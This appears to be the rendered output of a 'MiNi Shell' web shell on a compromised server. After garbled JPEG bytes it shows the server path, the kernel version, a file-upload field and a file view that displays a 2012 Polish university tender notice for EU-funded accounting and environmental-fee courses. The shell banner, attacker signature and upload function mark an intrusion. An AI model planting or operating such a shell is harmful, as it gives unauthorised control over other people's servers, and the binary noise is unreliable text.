JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121106/435372-N-2012.html

<p class="kh_header"><b>Słupsk: Przeprowadzenie kursów w projekcie Kierunki matematyczno-przyrodnicze drogą do zawodów z przyszłością dla studentów/studentek dwóch naborów</b><br>
<b>Numer ogłoszenia: 435372 - 2012; data zamieszczenia: 06.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Pomorska , ul. Arciszewskiego 22A, 76-200 Słupsk, woj. pomorskie, tel. 59 840 53 27, faks 59 842 95 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.apsl. edu..pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów w projekcie Kierunki matematyczno-przyrodnicze drogą do zawodów z przyszłością dla studentów/studentek dwóch naborów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na zorganizowaniu i przeprowadzeniu kursów dla studentów/studentek dwóch naborów w projekcie Kierunki matematyczno-przyrodnicze drogą do zawodów z przyszłością realizowanego przez Akademię Pomorską w Słupsku, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków  dokonana zostanie  zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte  w dokumentach i oświadczeniach wymienionych w pkt. 9 specyfikacji istotnych warunków zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków  dokonana zostanie  zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte  w dokumentach i oświadczeniach wymienionych w pkt. 9 specyfikacji istotnych warunków zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków  dokonana zostanie  zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte  w dokumentach i oświadczeniach wymienionych w pkt. 9 specyfikacji istotnych warunków zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o posiadaniu aktualnego  wpisu do rejestru instytucji szkoleniowych
Załącznik nr 6 do SIWZ
Wykaz osób i oświadczenie o posiadaniu wymaganego wykształcenia, kwalifikacji i doświadczenia- Załącznik nr 7 do SIWZ
Wykaz zrealizowanych  usług- Załącznik nr 8 do SIWZ
Oświadczenie podwykonawcy części zamówienia przewidziane przez Wykonawcę do wykonania przez podwykonawcę- załącznik nr 9 do SIWZ
Oświadczenie o wyrażeniu zgody na przetwarzanie danych osobowych- załącznik nr 10 do SIWZ
Dodatkowo w części 1 wymagane jest oświadczenie o posiadaniu decyzji o akredytacji  Stowarzyszenia Księgowych w Polsce w zakresie prowadzenia kursów dla kandydatów na księgowego - I stopień
Załącznik nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.apsl.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Pomorska w Słupsku, ul. Arciszewskiego 22 a, 76-200 Słupsk, budynek Wydziału Filologiczno- Historycznego, pok. nr 10..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 14:00, miejsce: Akademia Pomorska w Słupsku, ul. Arciszewskiego 22 a, 76-200 Słupsk, Kancelaria Ogólna- pok.35, budynek Wydziału Filologiczno- Historycznego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,
Priorytet IV: Szkolnictwo wyższe i nauka, 
Działanie 4.1: Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy, 
Poddziałanie 4.1.2: Zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i przeprowadzenie
Kursu księgowości I stopnia - Analityk księgowy         wraz z przeprowadzeniem egzaminu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników/czek- 20 osób (I nabór) w roku akademickim 2012/13 oraz 20 osób (II nabór) w roku akademickim 2013/2014
2.	Czas trwania  kursu -  80 godzin, jedna godzina lekcyjna obejmuje 45 minut zajęć dydaktycznych oraz 15 minut przerwy. Zajęcia powinny odbywać się w weekendy 
3.	Termin realizacji kursu - listopad-grudzień  2012 (I nabór), oraz listopad-grudzień 2013(II nabór)
4.	Miejsce realizacji kursu - Wydział Matematyczno-Przyrodniczy Akademii Pomorskiej w Słupsku
5.	Kwalifikacje - jednostka prowadząca szkolenie musi posiadać kwalifikacje do przeprowadzenia kursu, egzaminu końcowego oraz wydania świadectwa ukończenia kursu i wydania certyfikatu księgowego potwierdzającego ukończenie kursu kwalifikacyjnego I stopnia 
6.	Kadra prowadząca - wykładowcy z potwierdzonym doświadczeniem praktycznym
7.	Forma kursu - część teoretyczna i praktyczna. Zajęcia nie mogą być prowadzone metodą e-learningu. 
8.	Tematyka kursu - program kursu musi być zgodny z wytycznymi Stowarzyszenia Księgowych w Polsce
9.	Cena kursu - cena powinna zawierać przeprowadzenie zajęć  dydaktycznych, materiały szkoleniowe, egzamin,  certyfikaty i  zaświadczenia o ukończeniu kursu  oraz obsługę  administracyjną  organizatora szkolenia. Podana w ofercie cena powinna uwzględniać ogólny koszt brutto kursu oraz koszt kursu za jednego uczestnika.
10.	Efekt kształcenia - Efektem kształcenia powinna być nabyta wiedza zawodowa i opanowane umiejętności zawodowych dające zdolność wykonywania pracy w zawodzie księgowego.
11.	Materiały szkoleniowe - Każda osoba powinna otrzymać materiały z zajęć dotyczące przedmiotu zamówienia (np. podręczniki, materiały autorskie wykładowcy).  
12.	Dodatkowe wymogi - Materiały i pomieszczenia powinny być oznaczone logo Unii Europejskiej i logo Narodowej Strategii Spójności wraz z nazwą Programu Operacyjnego Kapitał Ludzki dostępnymi na stronie http://www.efs.gov.pl 
13.	Ankiety - Celem podnoszenia jakości prowadzonego kursu Wykonawca zobowiązany jest przeprowadzić anonimową ankietę dotyczącą oceny kursu przez uczestników.
14.	Egzamin - Kurs musi kończyć się egzaminem przed komisją powołaną przez organizatora kursu i wydaniem certyfikatu/zaświadczenia potwierdzającego posiadanie kwalifikacji zawodowych. Wykonawca sporządzi protokół z egzaminu kończącego kurs.
15.	Certyfikat/zaświadczenie - Po zakończeniu kursu uczestnik otrzyma 2 zaświadczenia/certyfikaty lub inne dokumenty potwierdzający ukończenie:
a)	zaświadczenie/certyfikaty lub inne dokumenty potwierdzający ukończenie który w treści musi zawierać w szczególności: dane osobowe uczestnika - absolwenta kursu (z datą i miejscem urodzenia), nazwę organizatora kursu, termin realizacji kursu, cel kursu, miejscowość i datę wydania zaświadczenia, podpis i pieczęć Wykonawcy uprawnionego do wydania zaświadczenia, nazwę zajęć edukacyjnych i wymiar godzin zajęć praktycznych oraz teoretycznych w zakresie poszczególnych modułów kursu. 
b)	zaświadczenie/certyfikaty lub inne dokumenty potwierdzający ukończenie zawierające dane wymienione w pkt. a wraz z umieszczonymi oznaczeniami Unii Europejskiej Europejski Fundusz Społeczny i Programu Operacyjnego Kapitał Ludzki oraz adnotacja: Projekt Kierunki matematyczno-przyrodnicze drogą do zawodów z przyszłością jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IV, Działanie 4.1, Poddziałanie 4.1.2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie Kursu Naliczanie opłat środowiskowych wraz wystawieniem certyfikatu uzyskania uprawnień.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników/czek - 24 osoby (I nabór) w roku akademickim 2012/13 oraz 24 osoby (II nabór) w roku akademickim 2013/2014
2.	Czas trwania  kursu -  zajęcia powinny odbywać się w weekendy, ilość godzin powinna być dostosowana do osiągnięcia efektu kształcenia. Jedna godzina lekcyjna obejmuje 45 minut zajęć dydaktycznych oraz 15 minut przerwy.
3.	Termin realizacji kursu -listopad 2012-styczeń 2013 (I nabór), listopad 2013-styczeń 2014 (II nabór)
4.	Miejsce realizacji kursu - Wydział Matematyczno-Przyrodniczy Akademii Pomorskiej w Słupsku
5.	Kwalifikacje - jednostka prowadząca szkolenie musi posiadać kwalifikacje do przeprowadzenia kursu oraz wydania świadectwa ukończenia kursu 
6.	Kadra prowadząca - wykładowcy z potwierdzonym doświadczeniem w zakresie interpretacji przepisów Prawa Ochrony Środowiska oraz dyrektyw unijnych
7.	Forma kursu - część teoretyczna i praktyczna. Zajęcia nie mogą być prowadzone metodą e-learningu. 
8.	Tematyka kursu - program kursu powinien obejmować następujące zagadnienia:
I. Podstawy prawne korzystania ze środowiska oraz zasady naliczania opłat 
1.	Podstawy prawne systemu opłat za korzystanie ze środowiska 
2.	Zasady naliczania opłat środowiskowych
3.	Uiszczanie opłat. 
4.	Rodzaje instalacji wymagające uzyskania pozwolenia zintegrowanego lub pozwolenia na wprowadzanie pyłów lub gazów do powietrza.
5.	Instalacje nie wymagające uzyskania pozwolenia na wprowadzanie pyłów lub gazów do powietrza.
6.	Rodzaje instalacji, których eksploatacja wymaga zgłoszenia.
7.	Podmioty objęte obowiązkiem przekazywania raportów do Krajowej Bazy.
8.	Zasady raportowania KOBIZE
 II. Gospodarka odpadami
1.	Charakterystyka najważniejszych krajowych przepisów regulujących postępowanie z odpadami.
2.	Zasady prawidłowej klasyfikacji odpadów.
3.	Ewidencja odpadów.
4.	Sprawozdawczość - zbiorcze zestawienie danych o rodzajach i ilości odpadów, o sposobach gospodarowania nimi oraz o instalacjach i urządzeniach służących  do odzysku i unieszkodliwiania odpadów.
9.	Cena kursu - cena powinna zawierać przeprowadzenie zajęć  dydaktycznych, materiały szkoleniowe ( podręczniki ), egzamin,  certyfikaty i  zaświadczenia o ukończeniu kursu  oraz obsługę  administracyjną  organizatora szkolenia. Podana w ofercie cena powinna uwzględniać ogólny koszt brutto kursu oraz koszt kursu za jednego uczestnika.
10.	Efekt kształcenia - Efektem kształcenia powinna być nabyta wiedza zawodowa i opanowane umiejętności z zakresu zasad obliczania opłat za korzystanie ze środowiska oraz zasad prowadzenia ewidencji danych potrzebnych do naliczenia stosownej opłaty za korzystanie ze środowiska. 
11.	Materiały szkoleniowe - Każda osoba powinna otrzymać materiały z zajęć dotyczące przedmiotu zamówienia (np. podręczniki, materiały autorskie wykładowcy).  
12.	Dodatkowe wymogi - Materiały i pomieszczenia powinny być oznaczone logo Unii Europejskiej i logo Narodowej Strategii Spójności wraz z nazwą Programu Operacyjnego Kapitał Ludzki dostępnymi na stronie http://www.efs.gov.pl  
13.	Ankiety - Celem podnoszenia jakości prowadzonego kursu Wykonawca zobowiązany jest przeprowadzić anonimową ankietę dotyczącą oceny kursu przez uczestników. 
14.	Certyfikat/zaświadczenie - Po zakończeniu kursu uczestnik otrzyma 2 zaświadczenia/certyfikaty lub inne dokumenty potwierdzający ukończenie:
a)	zaświadczenie/certyfikaty lub inne dokumenty potwierdzający ukończenie który w treści musi zawierać w szczególności: dane osobowe uczestnika - absolwenta kursu (z datą i miejscem urodzenia), nazwę organizatora kursu, termin realizacji kursu, cel kursu, miejscowość i datę wydania zaświadczenia, podpis i pieczęć Wykonawcy uprawnionego do wydania zaświadczenia, nazwę zajęć edukacyjnych i wymiar godzin zajęć praktycznych oraz teoretycznych w zakresie poszczególnych modułów kursu. 
b)	zaświadczenie/certyfikaty lub inne dokumenty potwierdzający ukończenie zawierające dane wymienione w pkt. a wraz z umieszczonymi oznaczeniami Unii Europejskiej Europejski Fundusz Społeczny i Programu Operacyjnego Kapitał Ludzki oraz adnotacja: Projekt Kierunki matematyczno-przyrodnicze drogą do zawodów z przyszłością jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IV, Działanie 4.1, Poddziałanie 4.1.2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com